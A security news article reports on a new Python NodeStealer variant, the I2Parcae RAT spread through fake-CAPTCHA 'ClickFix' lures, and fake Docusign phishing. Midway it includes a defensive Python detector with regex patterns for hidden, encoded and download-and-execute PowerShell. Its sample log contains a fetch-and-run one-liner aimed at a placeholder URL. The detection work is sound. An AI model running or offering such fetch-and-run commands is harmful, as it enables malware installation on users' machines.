Threat hunters warn of an updated Python-based version of NodeStealer that is now equipped to extract more information from victims’ Facebook Ads Manager accounts and collect credit card data stored in web browsers.
“They collect detailed information about the budget of their victims’ Facebook Ads Manager accounts, which can be a gateway to malicious Facebook advertising,” Ian Michael Alcantara, researcher at Netskope Threat Labs, said in a report shared with The Hacker News.
“New techniques used by NodeStealer include using Windows Restart Manager to unlock browser database files, add unnecessary code, and use batch scripting to dynamically generate and execute a Python script.”
NodeStealer, first publicly documented by Meta in May 2023, began as JavaScript malware before evolving into a Python-based stealer capable of collecting data associated with Facebook accounts to facilitate their takeover.
It is believed to have been developed by Vietnamese threat actors who have a history of using different malware families centered around hijacking Facebook ads and business accounts to instigate other malicious activities.
Netskope’s latest analysis shows that NodeStealer artifacts have begun targeting Facebook Ads Manager accounts used to manage Facebook and Instagram ad campaigns, in addition to hitting Facebook Business accounts.
At the same time, it is assumed that the attackers’ intention is not only to take control of Facebook accounts, but also to weaponize them in malicious campaigns that further distribute malware under the guise of popular programs or games.
“We recently found several Python NodeStealer samples that collect account budget information using the Facebook Graph API,” explained Michael Alcantara. “The samples initially generate an access token by logging into adsmanager.facebook(.)com using cookies collected on the victim’s machine.”
In addition to collecting tokens and business information associated with these accounts, the malware includes a check that is clearly designed to avoid infecting machines located in Vietnam, a way to evade law enforcement that further cements its origins.
In addition, certain NodeStealer samples have been found to use the legitimate Windows Restart Manager to unlock SQLite database files that may be in use by other processes. This is done in order to retrieve credit card details from different web browsers.
The stolen data is exfiltrated via Telegram, underscoring that the messaging platform remains a critical vector for cybercriminals in spite of recent changes to its policies.
Malicious advertising through Facebook is a lucrative infection route, often masquerading as trusted brands to spread all kinds of malware. This is evidenced by the emergence of a new campaign that started on November 3, 2024, which impersonated the Bitwarden password manager software through Facebook-sponsored ads to install a fake Google Chrome extension.
“The malware collects personal data and targets Facebook business accounts, which can lead to financial losses for individuals and businesses,” Bitdefender said in a report released Monday. “Once again, this campaign highlights how threat actors are using trusted platforms like Facebook to lure users into compromising their own security.”
Phishing emails distribute the I2Parcae RAT via the ClickFix technique
The development comes after Cofense warned of new phishing campaigns using website contact forms and invoice-themed lures to deliver malware families such as the I2Parcae RAT and PythonRatLoader, respectively, with the latter acting as a conduit to deploy AsyncRAT, DCRat, and Venom RAT.
I2Parcae “is notable for having several unique tactics, techniques, and procedures (TTPs), such as evasion of the Secure Email Gateway (SEG) by proxying emails through legitimate infrastructure, forging CAPTCHAs, abusing Windows functionality hard-coded to hide leaked files, and C2 capabilities over the Invisible Internet Project (I2P), an anonymous peer-to-peer network with encryption,” Cofense researcher Kang An said.
“When infected, I2Parcae is capable of disabling Windows Defender, enumerating Windows Security Accounts Manager (SAM) for accounts/groups, stealing browser cookies and remote access to infected hosts.”
Attack chains involve distributing booby-trapped pornographic links in e-mail messages that, when clicked, take recipients to an intermediate fake CAPTCHA page that prompts victims to copy and execute an encoded PowerShell script to access the content, a method dubbed ClickFix.
ClickFix, in recent months, has become a popular social engineering trick to lure unsuspecting users into downloading malware under the guise of fixing a supposed bug or passing a reCAPTCHA check. It is also effective at bypassing security controls because users infect themselves by executing the code.
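As an added example (not from the article or any of the vendors it cites), the following Python script shows the defender-side view of the ClickFix pattern: it scans process-creation events for an interactive shell spawned directly from explorer.exe (what happens when a victim pastes into the Run dialog) combined with a hidden window, an -EncodedCommand payload, or a download-and-execute keyword, and decodes the encoded command for the analyst. The key=value log format, the field names and all four sample events are constructed for this example; the URL is a placeholder.

```python
"""Heuristic ClickFix detector over constructed process-creation log lines.

Added example, not code from the article. Flags interactive shells spawned
from explorer.exe (the Run-dialog / pasted-clipboard pattern) that also use a
hidden window, an encoded command, or a download-and-execute keyword.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed log format: space-separated key="value" pairs per event.
KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
HIDDEN = re.compile(r"(?i)-w(?:indowstyle)?\s+h(?:idden)?\b")
CRADLE = re.compile(r"(?i)\b(?:iex|invoke-expression|iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring)\b")
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}


def encode_ps(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_ps(blob: str) -> Optional[str]:
    """Reverse encode_ps; returns None if the blob is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def parse_line(line: str) -> dict:
    """Turn one key="value" log line into a dict (quoted or bare values)."""
    return {k: (q if q else u) for k, q, u in KV.findall(line)}


@dataclass
class Finding:
    line_no: int
    reasons: list = field(default_factory=list)
    decoded: Optional[str] = None


def analyse(line_no: int, ev: dict) -> Finding:
    """Collect independent weak signals for a single process-creation event."""
    f = Finding(line_no)
    parent = ev.get("parent", "").rsplit("\\", 1)[-1].lower()
    image = ev.get("image", "").rsplit("\\", 1)[-1].lower()
    cmd = ev.get("cmdline", "")
    if parent == "explorer.exe" and image in SHELLS:
        f.reasons.append("shell spawned directly from explorer.exe (Run dialog / paste pattern)")
    if HIDDEN.search(cmd):
        f.reasons.append("hidden window requested")
    m = ENC_FLAG.search(cmd)
    if m:
        f.reasons.append("encoded command")
        f.decoded = decode_ps(m.group(1))
    # Look for fetch-and-run keywords in the raw and the decoded command line.
    if CRADLE.search(cmd + " " + (f.decoded or "")):
        f.reasons.append("download/execute keyword")
    return f


def scan(log_text: str, min_reasons: int = 2) -> list:
    """Return findings for events with at least min_reasons signals (a single signal is too noisy)."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        if line.strip():
            f = analyse(n, parse_line(line))
            if len(f.reasons) >= min_reasons:
                findings.append(f)
    return findings


# Constructed sample events; the decoded payload is deliberately harmless.
SAMPLE_LOG = "\n".join([
    # 1: classic ClickFix shape: Explorer -> hidden, encoded PowerShell
    r'parent="C:\Windows\explorer.exe" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    + 'cmdline="powershell -w hidden -enc ' + encode_ps("Write-Host 'constructed sample'") + '"',
    # 2: admin opening an interactive shell from Explorer: one weak signal only
    r'parent="C:\Windows\explorer.exe" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmdline="powershell -Command Get-Date"',
    # 3: scheduled maintenance script: no signal
    r'parent="C:\Windows\System32\cmd.exe" image="C:\Program Files\PowerShell\7\pwsh.exe" cmdline="pwsh -NoProfile -File C:\scripts\backup.ps1"',
    # 4: fetch-and-run one-liner pasted from Explorer (placeholder URL)
    r'parent="C:\Windows\explorer.exe" image="C:\Program Files\PowerShell\7\pwsh.exe" cmdline="pwsh -c irm https://example.invalid/x | iex"',
])


def main() -> None:
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: " + "; ".join(f.reasons))
        if f.decoded is not None:
            print("  decoded: " + f.decoded)


if __name__ == "__main__":
    main()
```

Requiring two independent signals keeps an administrator who simply opens PowerShell from Explorer (event 2) out of the alert queue, while events 1 and 4 are flagged; in a real deployment the same logic applies to Sysmon Event ID 1 or Windows Security 4688 fields (ParentImage, Image, CommandLine), and the decoded command gives the analyst something to read rather than a base64 blob.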
Enterprise security firm Proofpoint said the ClickFix technique is being used by numerous unattributed threat actors to deliver an array of remote access Trojans, stealers and even post-exploitation frameworks such as Brute Ratel C4. It has even been adopted by suspected Russian espionage actors targeting Ukrainian state entities.
“Threat actors have recently been seen using ClickFix’s fake CAPTCHA technique, which pretends to authenticate the user with a ‘Verify You’re Human’ (CAPTCHA) verification,” security researchers Tommy Madjar and Selena Larson said. “Much of the activity is based on an open source toolkit called reCAPTCHA phish available on GitHub for ‘educational purposes’.”
“What’s insidious about this technique is that the adversaries prey on people’s innate desire to be useful and independent. By offering what appears to be both a problem and a solution, people feel empowered to ‘fix’ the problem themselves without having to contact their IT team or anyone else, and it bypasses security protections, forcing the person to infect themselves.”
The disclosure also coincides with an increase in phishing attacks that use fake Docusign requests to evade detection and ultimately commit financial fraud.
“These attacks present a dual threat to contractors and suppliers – immediate financial loss and potential business disruption,” SlashNext said. “If a false document is signed, it can trigger unauthorized charges while creating confusion about the actual status of the license. This uncertainty could lead to delays in bidding for new projects or maintaining existing contracts.”